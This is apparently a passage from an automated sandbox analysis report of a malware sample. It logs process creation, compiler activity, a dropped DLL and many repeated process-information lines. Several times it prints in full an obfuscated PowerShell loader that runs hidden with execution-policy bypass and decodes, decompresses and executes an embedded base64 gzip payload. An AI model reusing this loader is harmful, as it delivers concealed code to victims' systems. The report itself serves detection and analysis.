3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAD8167 push ebx; ret 0_2_00007FFD9BAD816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC4845 pushad ; retf 4_2_00007FFD9BAC4849
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC476C push ebp; iretd 4_2_00007FFD9BAC477A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC6695 pushfd ; iretd 4_2_00007FFD9BAC66AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC469C push ecx; iretd 4_2_00007FFD9BAC46AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC46AC push ebx; iretd 4_2_00007FFD9BAC46DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC460C push ecx; iretd 4_2_00007FFD9BAC460D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC4645 push ecx; iretd 4_2_00007FFD9BAC4646
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC4585 push ecx; iretd 4_2_00007FFD9BAC45DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC45CC push ecx; iretd 4_2_00007FFD9BAC45DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC28F2 push ebp; retf 4_2_00007FFD9BAC290A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC2925 push edi; retf 4_2_00007FFD9BAC294A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC28BC push ebx; retf 4_2_00007FFD9BAC28EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BAC28AC push eax; retf 4_2_00007FFD9BAC28BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9BB90D6C push eax; ret 4_2_00007FFD9BB90D6D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
